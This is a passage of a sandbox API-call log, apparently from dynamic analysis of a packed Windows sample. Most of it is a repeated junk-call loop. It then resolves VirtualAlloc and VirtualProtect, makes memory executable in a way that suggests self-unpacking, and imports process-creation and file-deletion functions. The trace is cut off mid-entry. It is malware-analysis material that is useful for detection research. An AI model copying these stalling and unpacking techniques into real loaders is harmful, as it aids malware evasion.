(hChangeHandle=0x0) returned 0 [0083.539] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.539] AddAtomA (lpString=0x0) returned 0x0 [0083.539] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.539] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.539] AddAtomA (lpString=0x0) returned 0x0 [0083.539] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.539] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.539] AddAtomA (lpString=0x0) returned 0x0 [0083.539] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.539] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.539] AddAtomA (lpString=0x0) returned 0x0 [0083.539] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.539] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.539] AddAtomA (lpString=0x0) returned 0x0 [0083.539] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.539] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.540] AddAtomA (lpString=0x0) returned 0x0 [0083.540] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.540] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.540] AddAtomA (lpString=0x0) returned 0x0 [0083.540] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.540] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.540] AddAtomA (lpString=0x0) returned 0x0 [0083.540] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.540] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.540] AddAtomA (lpString=0x0) returned 0x0 [0083.540] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.540] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.540] AddAtomA (lpString=0x0) returned 0x0 [0083.540] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.540] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.540] AddAtomA (lpString=0x0) returned 0x0 [0083.540] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.540] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.540] AddAtomA (lpString=0x0) returned 0x0 [0083.540] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.540] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.541] AddAtomA (lpString=0x0) returned 0x0 [0083.541] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.541] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.541] AddAtomA (lpString=0x0) returned 0x0 [0083.541] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.541] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.541] AddAtomA (lpString=0x0) returned 0x0 [0083.541] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.541] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.541] AddAtomA (lpString=0x0) returned 0x0 [0083.541] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.541] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.541] AddAtomA (lpString=0x0) returned 0x0 [0083.541] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.541] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.541] AddAtomA (lpString=0x0) returned 0x0 [0083.541] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.541] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.541] AddAtomA (lpString=0x0) returned 0x0 [0083.541] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.541] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.541] AddAtomA (lpString=0x0) returned 0x0 [0083.542] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.542] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.542] AddAtomA (lpString=0x0) returned 0x0 [0083.542] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.542] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.542] AddAtomA (lpString=0x0) returned 0x0 [0083.542] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.542] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.542] AddAtomA (lpString=0x0) returned 0x0 [0083.542] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.542] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.542] AddAtomA (lpString=0x0) returned 0x0 [0083.542] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.542] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.542] AddAtomA (lpString=0x0) returned 0x0 [0083.542] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.542] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.542] AddAtomA (lpString=0x0) returned 0x0 [0083.542] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.543] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.543] AddAtomA (lpString=0x0) returned 0x0 [0083.543] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.543] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.543] AddAtomA (lpString=0x0) returned 0x0 [0083.543] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.543] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.543] AddAtomA (lpString=0x0) returned 0x0 [0083.543] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.543] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.543] AddAtomA (lpString=0x0) returned 0x0 [0083.543] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.543] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.543] AddAtomA (lpString=0x0) returned 0x0 [0083.544] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.544] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.544] AddAtomA (lpString=0x0) returned 0x0 [0083.544] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.544] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.544] AddAtomA (lpString=0x0) returned 0x0 [0083.544] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.544] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.544] AddAtomA (lpString=0x0) returned 0x0 [0083.544] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.544] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.544] AddAtomA (lpString=0x0) returned 0x0 [0083.544] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.545] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.545] AddAtomA (lpString=0x0) returned 0x0 [0083.545] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.545] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.545] AddAtomA (lpString=0x0) returned 0x0 [0083.545] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.545] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.545] AddAtomA (lpString=0x0) returned 0x0 [0083.545] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.545] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.545] AddAtomA (lpString=0x0) returned 0x0 [0083.545] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.546] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.546] AddAtomA (lpString=0x0) returned 0x0 [0083.546] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.703] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.703] AddAtomA (lpString=0x0) returned 0x0 [0083.703] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.703] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.703] AddAtomA (lpString=0x0) returned 0x0 [0083.703] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.703] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.703] AddAtomA (lpString=0x0) returned 0x0 [0083.703] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.703] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.703] AddAtomA (lpString=0x0) returned 0x0 [0083.704] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.704] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.704] AddAtomA (lpString=0x0) returned 0x0 [0083.704] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.704] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.704] AddAtomA (lpString=0x0) returned 0x0 [0083.704] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.704] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.704] AddAtomA (lpString=0x0) returned 0x0 [0083.704] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.704] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.705] AddAtomA (lpString=0x0) returned 0x0 [0083.705] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.705] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.705] AddAtomA (lpString=0x0) returned 0x0 [0083.705] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.705] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.705] AddAtomA (lpString=0x0) returned 0x0 [0083.705] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.705] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.705] AddAtomA (lpString=0x0) returned 0x0 [0083.705] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.706] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.706] AddAtomA (lpString=0x0) returned 0x0 [0083.706] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.706] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.706] AddAtomA (lpString=0x0) returned 0x0 [0083.706] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.706] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.706] AddAtomA (lpString=0x0) returned 0x0 [0083.706] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.706] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.707] AddAtomA (lpString=0x0) returned 0x0 [0083.707] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.707] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.707] AddAtomA (lpString=0x0) returned 0x0 [0083.707] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.707] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.707] AddAtomA (lpString=0x0) returned 0x0 [0083.707] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.707] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.707] AddAtomA (lpString=0x0) returned 0x0 [0083.707] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.708] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.708] AddAtomA (lpString=0x0) returned 0x0 [0083.708] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.708] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.708] AddAtomA (lpString=0x0) returned 0x0 [0083.708] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.708] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.708] AddAtomA (lpString=0x0) returned 0x0 [0083.708] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.708] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.708] AddAtomA (lpString=0x0) returned 0x0 [0083.709] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.709] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.709] AddAtomA (lpString=0x0) returned 0x0 [0083.709] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.709] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.709] AddAtomA (lpString=0x0) returned 0x0 [0083.709] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.709] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.709] AddAtomA (lpString=0x0) returned 0x0 [0083.709] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.709] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.709] AddAtomA (lpString=0x0) returned 0x0 [0083.710] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.710] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.710] AddAtomA (lpString=0x0) returned 0x0 [0083.710] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.710] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.710] AddAtomA (lpString=0x0) returned 0x0 [0083.710] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.710] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.710] AddAtomA (lpString=0x0) returned 0x0 [0083.710] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.710] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.711] AddAtomA (lpString=0x0) returned 0x0 [0083.711] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.711] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.711] AddAtomA (lpString=0x0) returned 0x0 [0083.711] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.711] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.711] AddAtomA (lpString=0x0) returned 0x0 [0083.711] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.711] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.711] AddAtomA (lpString=0x0) returned 0x0 [0083.711] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.712] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.712] AddAtomA (lpString=0x0) returned 0x0 [0083.712] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.712] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.712] AddAtomA (lpString=0x0) returned 0x0 [0083.712] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.712] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.712] AddAtomA (lpString=0x0) returned 0x0 [0083.712] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.712] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.712] AddAtomA (lpString=0x0) returned 0x0 [0083.712] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.713] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.713] AddAtomA (lpString=0x0) returned 0x0 [0083.713] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.713] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.713] AddAtomA (lpString=0x0) returned 0x0 [0083.713] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.713] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.713] AddAtomA (lpString=0x0) returned 0x0 [0083.713] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.713] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.713] AddAtomA (lpString=0x0) returned 0x0 [0083.714] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.714] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.714] AddAtomA (lpString=0x0) returned 0x0 [0083.714] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.714] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.714] AddAtomA (lpString=0x0) returned 0x0 [0083.714] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.714] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.714] AddAtomA (lpString=0x0) returned 0x0 [0083.714] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.714] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.715] AddAtomA (lpString=0x0) returned 0x0 [0083.715] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.715] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.715] AddAtomA (lpString=0x0) returned 0x0 [0083.715] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.715] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.715] AddAtomA (lpString=0x0) returned 0x0 [0083.715] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.715] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.715] AddAtomA (lpString=0x0) returned 0x0 [0083.715] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.716] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.716] AddAtomA (lpString=0x0) returned 0x0 [0083.716] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.716] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.716] AddAtomA (lpString=0x0) returned 0x0 [0083.716] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.716] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.716] AddAtomA (lpString=0x0) returned 0x0 [0083.716] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.716] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.739] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0083.739] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0083.739] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0083.740] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0083.740] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0083.740] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0083.740] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0083.740] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0083.740] SetErrorMode (uMode=0x400) returned 0x0 [0083.741] SetErrorMode (uMode=0x0) returned 0x400 [0083.741] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0083.741] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0083.746] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0083.839] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.840] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0083.840] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0083.840] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0083.841] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0083.841] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0083.841] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessA") returned 0x76e21072 [0083.841] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyW") returned 0x76e43102 [0083.841] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessW") returned 0x76e2103d [0083.841] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForSingleObject") returned 0x76e21136 [0083.841] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0083.841] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenA") returned 0x76e25a4b [0083.841] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0083.841] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0083.841] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineW") returned 0x76e25223 [0083.841] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0083.841] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointerEx") returned 0x76e3c807 [0083.841] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0083.842] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileA") returned 0x76e25444 [0083.842] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0083.842] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0083.842] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0083.842] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 [0083.842] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0083.842] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0083.842] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0083.890] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatA") returned 0x76e42b7a [0083.890] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyA") returned 0x76e42a9d [0083.890] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentVariableA") returned 0x76e233a0 [0083.890] GetProcAddress (hModule=0x76e10000, lpProcName="GetShortPathNameA") returned 0x76e4594d [0083.890] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameA") returned 0x76e214b1 [0083.890] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0083.890] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0083.891] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0083.891] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0083.891] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineA") returned 0x76e251a1 [0083.891] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0083.891] GetProcAddress (hModule=0x76e10000, 